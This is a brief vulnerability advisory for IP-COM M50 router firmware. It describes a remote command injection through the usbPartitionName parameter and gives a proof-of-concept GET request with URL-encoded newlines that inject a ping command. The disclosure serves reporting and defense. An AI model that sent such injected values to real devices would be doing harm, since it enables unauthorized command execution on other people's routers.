# ip-com-12
vendor:IP-COM
product:M50
version:V15.11.0.33(10768)
type:Remote Command Injection
author:Yifeng Li, Wolin Zhuang;
## Vulnerability description
We found an Command Injection vulnerability in IP-COM Technology IP-COM’s M50 routers with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted GET request.
## Remote Command Injection vulnerability
In formSetUSBPartitionUmount function, the parameter "usbPartitionName" is insufficiently filter the string delivered by the user, so we can control the usbPartitionName such as “-h%0aping%20x.x.x.x%20-w%2-5%0a ” to attack the OS.
![](https://i.imgur.com/ZDXGwpn.png)
![](https://i.imgur.com/sJ3AykL.png)
## PoC
### Remote Command Injection
We set the value of "usbPartitionName" as aaa\nping x.x.x.x and the router will excute ping command.
example.com/action/umountUSBPartition?usbPartitionName=-h%0aping%20x.x.x.x%20-w%2-5%0a
![](https://i.imgur.com/dMRyJQU.jpg)